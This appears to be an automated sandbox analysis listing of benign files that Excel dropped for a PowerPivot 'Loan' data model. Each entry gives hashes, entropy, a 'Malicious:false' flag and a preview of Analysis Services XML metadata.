                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date (Year)" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">14</Records><RecordsPerSegment xsi:type="xsd:long">11</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><Segment

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Payment Date.2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5019), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):5019
                                                                                                Entropy (8bit):5.1460568027691
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:ENfzhwMckwYWKggD0LXTnKjiDLXTnKjBD9FBAmN:OOMckwYWKzDUTnKjivTnKjBD9FBhN
                                                                                                MD5:D6309660CF5FD3AF09E93177EF14C946
                                                                                                SHA1:252431EC0BDCD6B99ED6C57A1A21002E6620007D
                                                                                                SHA-256:8B72BAC6A7321475B0E3BE01E5B267CB4996C667631B3CD4E4C9FFE7ED704F5A
                                                                                                SHA-512:7FE4D20B2240D4308ADAF308528A1758E12841F93E6B724FE4E9814F3C58B421F3A02550EC5D990285AA828E89FB3CE632A2089917D680DA8CC3F598FFF29CBC
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment Date" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Payment.2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (10581), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):10581
                                                                                                Entropy (8bit):5.133591480280514
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:YOykwYWKzDoTnKjioTnKjixTnKjBDvFB4WWKzDoTnKjioTnKjixTnKjBDXFBGN:iKcKFK8KZSKcKFK8KRk
                                                                                                MD5:D57D14BAFFA11F29A3D048425F285961
                                                                                                SHA1:E3CB83EBCB556B08DD0B626F3006104C9DE9B6F7
                                                                                                SHA-256:7529636BB015E9B3E998F7F5C2CD7675D2C4E99AC4443496C606C125CED9F09D
                                                                                                SHA-512:C9847D8EBDED829D89BFF73D005906A9C6433580A9833B9E7D9BD32B9789EE4FB41A6147566B98217C123E9FECBE5990F6F5191DAA7DB175017D77FB4A556A1C
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Payment" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">3</Segments><Records xsi:type="xsd:long">5</Records><RecordsPerSegment xsi:type="xsd:long">2</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:type=

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Pmt No.2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8672), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8672
                                                                                                Entropy (8bit):5.142715683899685
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AOMckwYWKzDUTnKjivTnKjBDnFBTWWKzDUTnKjivTnKjBDPFBhN:PK4KWKJVK4KWKBD
                                                                                                MD5:6A783660069AE44B799ED595888C11F2
                                                                                                SHA1:A42F5E2EDD3F87691BB3799FD6ADFC1E7C40A3A0
                                                                                                SHA-256:15988CAEA4E2B38252DFF301BF962B1F6A76FD7CD00DB23CC992C7777E38A2CF
                                                                                                SHA-512:A586D45E98FD13DFD1B3A2346EC20B433A3BFCB574F39E3E1D32DAF0E4D9BFE7A820E7008D97C80C65DF26602E70A6FC536989FAD04C31F958947E67D8AC0ADD
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Pmt No" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi:ty

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\H$Loan$Principal.2.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (8681), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8681
                                                                                                Entropy (8bit):5.1415263305068475
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AOMckwYWKzDUTnKjivTnKjBD/FBTWWKzDUTnKjivTnKjBDnFBhN:PK4KWKRVK4KWKJD
                                                                                                MD5:DCFD7E43A547B8B2E9B88A079D1E5C30
                                                                                                SHA1:7F83FDE40055A81016F64EDEACCF473737824EA7
                                                                                                SHA-256:DD04AC4A25AB968C5F3E234D1FE6629BE465E59EA0A5E107FC01604BAC91CCE4
                                                                                                SHA-512:1B6CEEBDE3A191358ACED20E41923D126B7E5C08EBE617791D4D9614332A7ECA6C6D2A5507ED30C67DBA1274F17F2DBEF3C324D16D1BFC83FB09448065728EA6
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="H$Loan$Principal" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">2</Version><Settings xsi:type="xsd:long">4</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMSegmentEqualMapEx&lt;XMSegmentEqualMap_ComplexInstantiation>" ProviderVersion="0"><Properties><Segments xsi:type="xsd:long">2</Segments><Records xsi:type="xsd:long">124</Records><RecordsPerSegment xsi:type="xsd:long">121</RecordsPerSegment></Properties></XMObject></Member><Member><Name>TableStats</Name><XMObject class="XMTableStats" ProviderVersion="0"><Properties><SegmentSize xsi

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\Loan.22.tbl.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (64599), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):64599
                                                                                                Entropy (8bit):5.1651262854074025
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:5AjKKOjG6jEKYjFxjKKOjQtKzKhKDyjyKOjdajyKOjp3jyKOjzFKuKyKoojdKijV:5uLNGfD692pHp
                                                                                                MD5:D6140125EBC756F403448C5652E7E73F
                                                                                                SHA1:65E4E25CBB9AE29B3566E46D633B5E0F2B9A287A
                                                                                                SHA-256:0DF87FA6D87AC3752EC1ED7D3F7C1AFFEB4EAD1E46224E14403239804560F91E
                                                                                                SHA-512:E41A2EDD70523ABD3AA94D8ECD1DF1CEFC919FDD09E6E362430ED10559B121669E992434DA7D7C359EB0EC19D861BD42A556F0AAA370D67C676AD2159E4D8F6E
                                                                                                Malicious:false
                                                                                                Preview:<XMObject xmlns="http://schemas.microsoft.com/analysisservices/imbi" xmlns:imbi200="http://schemas.microsoft.com/analysisservices/2010/imbi/200" xmlns:imbi200_200="http://schemas.microsoft.com/analysisservices/2010/imbi/200/200" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" class="XMSimpleTable" name="Loan" ProviderVersion="0"><Properties><Version xsi:type="xsd:int">22</Version><Settings xsi:type="xsd:long">4097</Settings><RIViolationCount xsi:type="xsd:long">0</RIViolationCount></Properties><Members><Member><Name>SegmentMap</Name><XMObject class="XMMultiPartSegmentMap" ProviderVersion="0"><Properties><FirstPartitionRecordCount xsi:type="xsd:long">0</FirstPartitionRecordCount><FirstPartitionSegmentCount xsi:type="xsd:long">0</FirstPartitionSegmentCount></Properties><Collections><Collection><Name>Partitions</Name><XMObject class="XMSegment1Map" ProviderVersion="0"><Properties><Records xsi:type="xsd:long">360</Records></Properties></XM

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\info.45.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (6150), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):6150
                                                                                                Entropy (8bit):5.043108582202338
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:tDLjZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZk:tDLN+N+N+N+N+N+N+N+N+N+N+Nk
                                                                                                MD5:7D1678433245EC05776715BAD2F149A4
                                                                                                SHA1:7F843EF3D86EC6397E893E245385CF654275C9BB
                                                                                                SHA-256:C81B36E3CBE12137D9F2EF62376CD4C0849005537764E7633B0C08150C29F315
                                                                                                SHA-512:1025EE2F3D279CC4CCA9D59F4B624426E1A1A9DA6D99B5B82817000CA4E2555C8BBAA2A31A58484A19DB95CFBBE475805D9643E1F4ECEC10E91137C805B18B4C
                                                                                                Malicious:false
                                                                                                Preview:<Dimension xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>21</DataVersion><IndexVersion>21</IndexVersion><DecodeStoreVersion>-1</DecodeStoreVersion><LevelStoreVersion>-1</LevelStoreVersion><Properties><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m_cSegment>0</m_cSegment><m_mskFormat>269484288</m_mskFormat><m_cbHeader>0</m_cbHeader><m_cPath>0</m_cPath><m_cData>0</m_cData><m_cSegmentIndex>4294967295</m_cSegmentIndex><MapDataIndices/><MinMaxValues/></MapDataset><Depth>0</Depth><Balanced>false</Balanced><HasHoles>false</HasHoles></Property><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.0.dim\info.46.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (6150), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):6150
                                                                                                Entropy (8bit):5.04159148551405
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:AqLjZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZ+jZk:AqLN+N+N+N+N+N+N+N+N+N+N+Nk
                                                                                                MD5:F76077F4091606540C605A60A4AFE39B
                                                                                                SHA1:2BBA8E3C36DFBF0E89808B74A0F37465FF955E2E
                                                                                                SHA-256:85C2A8AA6DC2F63AAD0C7A7ACCF3D31C65A3503C0B08E49D9150E58EBAD83047
                                                                                                SHA-512:CF48E83EB77051DBCA3E75A78887D873D3E119C1428E51FDBA578B0B49E2F743636FEE0359790C93469E9A907C1C52C8171FD1259D67232AC02B79BDC2FEB5C2
                                                                                                Malicious:false
                                                                                                Preview:<Dimension xmlns="http://schemas.microsoft.com/analysisservices/2003/ext" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><DataVersion>22</DataVersion><IndexVersion>22</IndexVersion><DecodeStoreVersion>-1</DecodeStoreVersion><LevelStoreVersion>-1</LevelStoreVersion><Properties><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m_cSegment>0</m_cSegment><m_mskFormat>269484288</m_mskFormat><m_cbHeader>0</m_cbHeader><m_cPath>0</m_cPath><m_cData>0</m_cData><m_cSegmentIndex>4294967295</m_cSegmentIndex><MapDataIndices/><MinMaxValues/></MapDataset><Depth>0</Depth><Balanced>false</Balanced><HasHoles>false</HasHoles></Property><Property><ParentChild>false</ParentChild><MapDataset><m_cbOffsetHeader>9223372036854775808</m_cbOffsetHeader><m_cbOffsetData>9223372036854775808</m_cbOffsetData><m_cRecord>0</m_cRecord><m

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.44.dim.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13638), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):38485
                                                                                                Entropy (8bit):5.219171783433957
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:FK3c2nc2Zc2Lc2Kc2Nc2gc24n2/QTQfQJQ9Q7QTQlQrQTQWc2Lc2G72n2ic2d5Z0:kQTQfQJQ9Q7QTQlQrQTQX7+5ZqB
                                                                                                MD5:07B3056A7D3DE766C3DCFBF99D64AC3E
                                                                                                SHA1:7FD783FF599140AC000A996E4E94606E26EE558B
                                                                                                SHA-256:4ADC40A4C9C29766B1B6C73F333791CFA81BDFF868D71922DC4B15C67FF09428
                                                                                                SHA-512:8D4C7D498D576835529A1800F4B2157F9642E3AFF6FC03F0B879B6CF669CF5CC18603C432D7118DF1271194904EA8119B949532C24C8F1C57F12B75E51664CAF
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.45.dim.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13638), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):36816
                                                                                                Entropy (8bit):5.216757219415159
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lBlc2zc2jc2vc2+c2hc20c24n2/QTQfQJQ9Q7QTQlQrQTQWc2Lc2G72n2ic2d5Z0:DQTQfQJQ9Q7QTQlQrQTQX7+5ZqB
                                                                                                MD5:C18336B365254434B4D3CE5BA5F3F8C6
                                                                                                SHA1:1B06F81B600D824614FF02FB009713C3C6E2AFF3
                                                                                                SHA-256:C655A6FDDACDBFCC096B04F51CB3EDDF40E5694845FF06C1B4D7ECBA38F34E4B
                                                                                                SHA-512:3A2714A17ECB5CD39FE33E97B122A848C2E043B5FB8F93DC88F85C5F21E78BEA508DB7F5346146767861F9AD99C8D7801F1C1F316191C093F7E05FF6F4A56F84
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Loan.46.dim.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (13638), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):38489
                                                                                                Entropy (8bit):5.221188451146488
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:pL3c2nc2Zc2Lc2Kc2Nc2gc24n2/QTQfQJQ9Q7QTQlQrQTQWc2Lc2G72n2ic2d5Zy:5QTQfQJQ9Q7QTQlQrQTQX7+5ZBs
                                                                                                MD5:611CF2CCD34AA503E6195DB4F793AE37
                                                                                                SHA1:9E3FD2D19A1220186BE3947DC9E5BBC4E8DB52F3
                                                                                                SHA-256:6ED8C6E41FA763F0FBF438579864FFE0EA7FC2B6FC12B9D34A6CDC467C5A5AE0
                                                                                                SHA-512:BE63F8CBA3C035CD893DA9A84FEB85591421AF430420069AAA48D9DBA784BB538A19C454E5633DB2501B14F90372D2A2CC74797EBDC920966BEBC680235D946B
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.28.cub.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5428), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8608
                                                                                                Entropy (8bit):5.119558189812626
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xIBNC4/qjlLN1OGX2QOGX2TOGX2yOGX26OGX2cOGX2BOGX2kwOGG2yOGX2jOGX26:zLXOGX2QOGX2TOGX2yOGX26OGX2cOGX9
                                                                                                MD5:C14D244395BACDF66BF749DF57C0ED0B
                                                                                                SHA1:9C25CBF6EDCA9FC5BDE413A69165B474DB562382
                                                                                                SHA-256:0D37FB0737445351288523BE1A5F7D62E4B9D848F66FF42FC3DDFEAEED4B9DD7
                                                                                                SHA-512:160DF76C7400B83F29A028902F984E2F0E2495A3D570E5579E878E0B010B9153D89F4EDC27757E720B535F4D622B6FDB3608E369ADBE7E6DB9ADBBFE1D3D0F01
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.29.cub.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (5424), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8604
                                                                                                Entropy (8bit):5.117586217393708
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xIBYC4/qjlLN1OGX2QOGX2TOGX2yOGX26OGX2cOGX2BOGX2kwOGG2yOGX2jOGX2e:mLXOGX2QOGX2TOGX2yOGX26OGX2cOGXJ
                                                                                                MD5:B23C8E5ADD256F22962AA34DFBC825B6
                                                                                                SHA1:F389FDF8D00AE3DEBF0B94F1FCF59077978AD39B
                                                                                                SHA-256:98DC193EA210A36AB7020F18C2D61D73E397CF65103128E5C8093B8141ED33EC
                                                                                                SHA-512:F042B43D872EE13CCFACA4DBB0F490822CD7F9F120EA580BB550990B0F47340AD1AE0B0A933BED3C0AEDF4F8C41D95A8A75F47F285B0867EF4CEB2A91357D274
                                                                                                Malicious:false
                                                                                                Preview:<Load xmlns="http://schemas.microsoft.com/analysisservices/2003/user" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/user/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/user/2/2" xmlns:ddl100="http://schemas.microsoft.com/analysisservices/2008/user/100" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/user/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/user/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/user/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/user/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/user/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/user/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/user/400/400" xmlns:ddl410="http://schemas.microsoft.com/analysisservices/2012/user/410" xmlns:ddl410_410="http://schemas.microsoft.com/analys

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AE0E2F52A0A8400DB850.0.db\Model.6.cub\Loan.43.det.xml

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:ASCII text, with very long lines (7774), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):7774
                                                                                                Entropy (8bit):5.176440781411377
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:07vexwKUYp0i4nq+0Bh0QqCRwy9u/KUdxrM+80QMTD5suNkrkrQhrfrBybzuvAk:xIV1y9iV8a2Suv5
                                                                                                MD5:9FA3F7836BAE5448676964C71387B9D0
                                                                                                SHA1:2679910A764D1F3C78CC7711000CEBB780EDBE95
                                                                                                SHA-256:8A9821A5AC0D62C52DBF4E35E0068DCF8A5846E4C01A92C6796CAA4177EFF4E7
                                                                                                SHA-512:F1F0DC77546027BBB1BCD9718BB010CFBE75DCEB2AC0E64803CE8E1DC49E9FFB1BAEB3E0C5E843611FAB2F459691C64B1E3FFDFD1FF5266A23848BCD1B75A67E
                                                                                                Malicious:false
